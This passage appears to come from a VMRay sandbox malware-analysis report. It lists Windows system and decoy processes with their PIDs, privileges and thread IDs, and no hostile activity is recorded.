| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x12c |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
FE8
0x
E74
0x
E70
0x
E54
0x
E4C
0x
85C
0x
858
0x
854
0x
850
0x
844
0x
5E0
0x
4F4
0x
4E0
0x
2B0
0x
1A0
0x
1B8
0x
138
|
Process #59: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #59 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k LocalService |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x170 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
134C
0x
1338
0x
4A8
0x
CD0
0x
C94
0x
C90
0x
C8C
0x
C88
0x
C84
0x
C7C
0x
C78
0x
C74
0x
C28
0x
C24
0x
C20
0x
C1C
0x
B90
0x
A48
0x
A00
0x
8E0
0x
674
0x
5B0
0x
5AC
0x
5A8
0x
5A4
0x
5A0
0x
598
0x
54C
0x
4EC
0x
4E8
0x
4C0
0x
478
0x
444
0x
440
0x
43C
0x
404
|
Process #60: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #60 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\System32\svchost.exe -k NetworkService |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x480 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
113C
0x
10E8
0x
10D4
0x
200
0x
E3C
0x
E7C
0x
6CC
0x
6C0
0x
EA8
0x
EA4
0x
670
0x
660
0x
65C
0x
64C
0x
628
0x
620
0x
614
0x
58C
0x
584
0x
580
0x
558
0x
550
0x
52C
0x
514
0x
510
0x
508
0x
484
|
Process #61: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #61 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4fc |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
9D8
0x
5B4
0x
570
0x
56C
0x
568
0x
564
0x
560
0x
524
0x
500
0x
1304
|
Process #62: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #62 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x530 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F60
0x
C54
0x
900
0x
8FC
0x
534
|
Process #63: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #63 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x538 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
66C
0x
618
0x
5FC
0x
5E4
0x
5DC
0x
5D8
0x
5D4
0x
5D0
0x
594
0x
53C
|
Process #64: spoolsv.exe
0
0
| Information | Value |
|---|---|
| ID | #64 |
| File Name | c:\windows\system32\spoolsv.exe |
| Command Line | C:\WINDOWS\System32\spoolsv.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5c4 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
13EC
0x
F18
0x
D78
0x
FF0
0x
D98
0x
D9C
0x
770
0x
6E4
0x
DFC
0x
E00
0x
650
0x
610
0x
604
0x
5EC
0x
5C8
|
Process #65: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #65 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k appmodel |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5f0 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
A2C
0x
A14
0x
8DC
0x
8D4
0x
520
0x
67C
0x
678
0x
644
0x
640
0x
63C
0x
5F4
|
Process #66: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #66 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k wsappx |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x684 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
1220
0x
518
0x
6A0
0x
698
0x
690
0x
688
0x
1B4
|
Process #67: audiodg.exe
0
0
| Information | Value |
|---|---|
| ID | #67 |
| File Name | c:\windows\system32\audiodg.exe |
| Command Line | C:\WINDOWS\system32\AUDIODG.EXE 0x3a0 |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6a4 |
| Parent PID | 0x4fc (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
D08
0x
FEC
0x
EE0
0x
FE4
0x
6BC
0x
6B8
0x
6B4
0x
6A8
|
Process #68: sihost.exe
0
0
| Information | Value |
|---|---|
| ID | #68 |
| File Name | c:\windows\system32\sihost.exe |
| Command Line | sihost.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6fc |
| Parent PID | 0x3c0 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AF8
0x
AF4
0x
8D8
0x
8A8
0x
8A4
0x
810
0x
4CC
0x
750
0x
73C
0x
728
0x
724
0x
710
0x
70C
0x
708
0x
700
|
Process #69: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #69 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x718 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
109C
0x
CE8
0x
CFC
0x
B98
0x
CD4
0x
C50
0x
C10
0x
608
0x
638
0x
77C
0x
774
0x
74C
0x
748
0x
740
0x
71C
|
Process #70: taskhostw.exe
0
0
| Information | Value |
|---|---|
| ID | #70 |
| File Name | c:\windows\system32\taskhostw.exe |
| Command Line | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7ac |
| Parent PID | 0x3c0 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
10BC
0x
A28
0x
98C
0x
8EC
0x
8B4
0x
B78
0x
B14
0x
830
0x
82C
0x
820
0x
818
0x
814
0x
780
0x
6B0
0x
680
0x
40C
0x
7B0
|
Process #71: officeclicktorun.exe
0
0
| Information | Value |
|---|---|
| ID | #71 |
| File Name | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe |
| Command Line | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7f4 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
838
0x
FFC
0x
E8C
0x
E78
0x
E6C
0x
E58
0x
9F0
0x
9EC
0x
9DC
0x
934
0x
930
0x
928
0x
920
0x
91C
0x
918
0x
8CC
0x
60C
0x
648
0x
488
0x
7F8
|
Process #72: securityhealthservice.exe
0
0
| Information | Value |
|---|---|
| ID | #72 |
| File Name | c:\windows\system32\securityhealthservice.exe |
| Command Line | C:\WINDOWS\system32\SecurityHealthService.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x55c |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeDebugPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
9FC
0x
9F8
0x
9D4
0x
8D0
0x
5E8
|
Process #73: explorer.exe
0
0
| Information | Value |
|---|---|
| ID | #73 |
| File Name | c:\windows\explorer.exe |
| Command Line | C:\WINDOWS\Explorer.EXE |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x860 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
1160
0x
FA8
0x
D50
0x
C98
0x
C80
0x
C68
0x
C64
0x
C60
0x
C5C
0x
C4C
0x
C44
0x
C40
0x
C3C
0x
C2C
0x
C0C
0x
994
0x
BBC
0x
AE8
0x
AE4
0x
AE0
0x
ADC
0x
AD8
0x
AD4
0x
AD0
0x
ACC
0x
AC0
0x
ABC
0x
AB8
0x
AB4
0x
AB0
0x
AAC
0x
AA8
0x
AA4
0x
AA0
0x
A94
0x
A74
0x
A6C
0x
A68
0x
A64
0x
A4C
0x
A44
0x
A40
0x
A38
0x
A10
0x
A0C
0x
9D0
0x
9BC
0x
9B8
0x
97C
0x
974
0x
964
0x
958
0x
914
0x
908
0x
8F8
0x
878
0x
874
0x
870
0x
864
0x
1268
0x
E24
|
Process #74: Memory Compression
0
0
| Information | Value |
|---|---|
| ID | #74 |
| File Name | - |
| Command Line | - |
| Initial Working Directory | - |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8bc |
| Parent PID | 0x4 (System) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
B4C
0x
B48
0x
B44
0x
B38
0x
B2C
0x
B20
0x
8C4
0x
8C0
|
Process #75: shellexperiencehost.exe
0
0
| Information | Value |
|---|---|
| ID | #75 |
| File Name | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe |
| Command Line | "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca |
| Initial Working Directory | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb50 |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E34
0x
DE8
0x
DE4
0x
DE0
0x
CB4
0x
CB0
0x
CA8
0x
CA4
0x
C08
0x
6E0
0x
6D0
0x
8C8
0x
69C
0x
79C
0x
634
0x
BE0
0x
BDC
0x
BD4
0x
BD0
0x
BA4
0x
BA0
0x
B9C
0x
B94
0x
B8C
0x
B88
0x
B68
0x
B54
|
Process #76: searchui.exe
0
0
| Information | Value |
|---|---|
| ID | #76 |
| File Name | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe |
| Command Line | "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca |
| Initial Working Directory | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb58 |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DD4
0x
DD0
0x
B74
0x
B70
0x
590
0x
578
0x
6C4
0x
6D4
0x
588
0x
828
0x
630
0x
7C4
0x
7A0
0x
438
0x
7FC
0x
778
0x
50C
0x
BF0
0x
BEC
0x
BE4
0x
BD8
0x
BCC
0x
BC8
0x
BC4
0x
BC0
0x
BB8
0x
BB4
0x
BB0
0x
BAC
0x
BA8
0x
B84
0x
B7C
0x
B6C
0x
B5C
|
Process #77: runtimebroker.exe
0
0
| Information | Value |
|---|---|
| ID | #77 |
| File Name | c:\windows\system32\runtimebroker.exe |
| Command Line | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf4 |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
734
0x
A0C
0x
57C
0x
61C
0x
BF8
|
Process #78: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #78 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:52, Reason: Self Terminated |
| Monitor Duration | 00:00:26 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe04 |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FF8
0x
E40
0x
E2C
0x
E28
0x
E24
0x
E20
0x
E1C
0x
E18
0x
E14
0x
E08
|
Process #79: taskhostw.exe
0
0
| Information | Value |
|---|---|
| ID | #79 |
| File Name | c:\windows\system32\taskhostw.exe |
| Command Line | taskhostw.exe Logon |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf6c |
| Parent PID | 0x3c0 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
744
0x
E84
0x
AF0
0x
FD8
0x
FD4
0x
FD0
0x
FCC
0x
FBC
0x
F70
0x
1084
0x
5CC
0x
EDC
0x
B98
|
Process #80: devicecensus.exe
0
0
| Information | Value |
|---|---|
| ID | #80 |
| File Name | c:\windows\system32\devicecensus.exe |
| Command Line | C:\WINDOWS\system32\devicecensus.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfa0 |
| Parent PID | 0x3c0 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
1044
0x
1260
0x
11EC
0x
1114
0x
784
0x
FA4
0x
5CC
|
Process #81: apphostregistrationverifier.exe
0
0
| Information | Value |
|---|---|
| ID | #81 |
| File Name | c:\windows\system32\apphostregistrationverifier.exe |
| Command Line | C:\WINDOWS\system32\AppHostRegistrationVerifier.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:03:14, Reason: Self Terminated |
| Monitor Duration | 00:00:48 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfac |
| Parent PID | 0x3c0 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
116C
0x
174
0x
15C
0x
B60
0x
408
0x
FB0
|
Process #82: entering.exe
0
0
| Information | Value |
|---|---|
| ID | #82 |
| File Name | c:\program files (x86)\windows mail\entering.exe |
| Command Line | "C:\Program Files (x86)\Windows Mail\entering.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Mail\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4d8 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
470
0x
4F0
|
Process #83: anne measurement nut.exe
0
0
| Information | Value |
|---|---|
| ID | #83 |
| File Name | c:\program files (x86)\reference assemblies\anne measurement nut.exe |
| Command Line | "C:\Program Files (x86)\Reference Assemblies\anne measurement nut.exe" |
| Initial Working Directory | C:\Program Files (x86)\Reference Assemblies\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x388 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B10
0x
3A8
|
Process #84: marilyn_becoming_editors.exe
0
0
| Information | Value |
|---|---|
| ID | #84 |
| File Name | c:\program files (x86)\msbuild\marilyn_becoming_editors.exe |
| Command Line | "C:\Program Files (x86)\MSBuild\marilyn_becoming_editors.exe" |
| Initial Working Directory | C:\Program Files (x86)\MSBuild\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcb8 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E94
0x
37C
|
Process #85: divorce mode twelve.exe
0
0
| Information | Value |
|---|---|
| ID | #85 |
| File Name | c:\program files (x86)\internet explorer\divorce mode twelve.exe |
| Command Line | "C:\Program Files (x86)\Internet Explorer\divorce mode twelve.exe" |
| Initial Working Directory | C:\Program Files (x86)\Internet Explorer\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7f0 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B0C
0x
7EC
|
Process #86: convertible-suicide-construction.exe
0
0
| Information | Value |
|---|---|
| ID | #86 |
| File Name | c:\program files\unp\convertible-suicide-construction.exe |
